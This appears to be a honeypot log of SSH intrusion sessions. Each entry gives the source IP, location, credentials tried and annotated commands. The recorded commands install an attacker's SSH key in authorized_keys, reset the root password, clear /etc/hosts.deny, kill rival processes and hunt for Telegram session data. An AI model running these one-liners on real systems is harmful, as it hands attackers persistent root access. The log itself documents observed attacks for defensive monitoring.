$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:ELYQXiOtHEw0"|chpasswd|bash
🎭 hanbok_root (61.77.63.232) β€” Anyang-si, South Korea Β· 1 session Β· 9 cmds
2026-05-18 05:14 EDT Β· as root/admin
network mapping β†’ OS/kernel identification β†’ CPU profiling
$ /ip cloud print
$ ifconfig // network mapping
$ uname -a // OS/kernel identification
$ cat /proc/cpuinfo // CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
🎭 wraith_sol_2 (43.156.3.122) β€” Singapore, Singapore Β· 3 sessions Β· 57 cmds
2026-05-18 04:47 EDT Β· as root/hermina, root/root2024@, root/zxc123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:hLrVlo4Hs8Z3"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:FhPe11dLcE4H"|chpasswd|bash
$ echo "root:tupB5eG3GFAX"|chpasswd|bash
🎭 star_sol_2 (43.153.35.95) β€” Santa Clara, United States Β· 2 sessions Β· 38 cmds
2026-05-18 04:47 EDT Β· as root/hermina, root/root2024@
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:F4jfkqKIGbm4"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:cVcVSY5PqyMl"|chpasswd|bash
🎭 samba_root_9 (177.92.162.246) β€” Silves, Brazil Β· 1 session Β· 19 cmds
2026-05-18 04:50 EDT Β· as root/zxc123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:GUPeKYxhgfDP"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 frost_root_13 (88.205.172.170) β€” Yekaterinburg, Russia Β· 1 session Β· 19 cmds
2026-05-18 04:49 EDT Β· as root/vmailpass
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:hV3wpj6bykXR"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 yankee_root_43 (166.62.80.68) β€” Tempe, United States Β· 3 sessions Β· 57 cmds
2026-05-18 04:26 EDT Β· as root/clee, root/jsm, root/qwert1234567
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:PstNf2cFas1j"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:haO1Z1EKREmP"|chpasswd|bash
$ echo "root:XscsqHVAcBJ1"|chpasswd|bash
🎭 ghost_root_106 (103.30.41.231) β€” San Po Kong, Hong Kong Β· 2 sessions Β· 38 cmds
2026-05-18 04:26 EDT Β· as root/jsm, root/qwert1234567
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:kFflKc8pWyYz"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:l3JDB9zI9eiP"|chpasswd|bash
🎭 cowboy_root_50 (43.159.168.55) β€” Santa Clara, United States Β· 3 sessions Β· 57 cmds
2026-05-18 04:24 EDT Β· as root/clee, root/jsm, root/qwert1234567
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:qscvm7jKDlek"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:N2YbnI2ooSuu"|chpasswd|bash
$ echo "root:PXWx7bqzYTXL"|chpasswd|bash
🎭 liberty_root_41 (43.135.154.131) β€” Santa Clara, United States Β· 1 session Β· 19 cmds
2026-05-18 04:26 EDT Β· as root/159357
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:BAXjOpbTrm6p"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_83 (178.128.18.100) β€” Singapore, Singapore Β· 1 session Β· 19 cmds
2026-05-18 04:18 EDT Β· as root/qwert1234567
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:GyD3PUGbl1OK"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 chai_root_20 (143.110.242.111) β€” Bengaluru, India Β· 3 sessions Β· 58 cmds
2026-05-18 02:24 EDT Β· as adv/123, root/!Qaz@Wsx, root/Dev@123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:uheIHsfFRhvq"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "123\nGOeibzuA47Xn\nGOeibzuA47Xn"|passwd|bash
$ Enter new UNIX password:
$ echo "123\nGOeibzuA47Xn\nGOeibzuA47Xn\n"|passwd
$ echo "root:HreiSvM88Ixy"|chpasswd|bash
🎭 acai_root_8 (137.131.154.188) β€” SΓ£o Paulo, Brazil Β· 1 session Β· 9 cmds
2026-05-18 02:38 EDT Β· as root/root
network mapping β†’ OS/kernel identification β†’ CPU profiling
$ /ip cloud print
$ ifconfig // network mapping
$ uname -a // OS/kernel identification
$ cat /proc/cpuinfo // CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
🎭 eagle_root_52 (191.96.196.54) β€” New York, United States Β· 3 sessions Β· 58 cmds
2026-05-18 02:27 EDT Β· as adv/123, root/!Qaz@Wsx, root/Dev@123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:Su4orYjREplI"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:oKzjd9oIH6y1"|chpasswd|bash
$ echo -e "123\n6HzAbhj6K0sQ\n6HzAbhj6K0sQ"|passwd|bash
$ Enter new UNIX password:
$ echo "123\n6HzAbhj6K0sQ\n6HzAbhj6K0sQ\n"|passwd
🎭 liberty_root_42 (49.51.228.164) β€” Santa Clara, United States Β· 1 session Β· 19 cmds
2026-05-18 02:34 EDT Β· as root/A123456a
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:3FcVYH8K3tRC"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 liberty_root_43 (43.159.149.146) β€” Santa Clara, United States Β· 3 sessions Β· 58 cmds
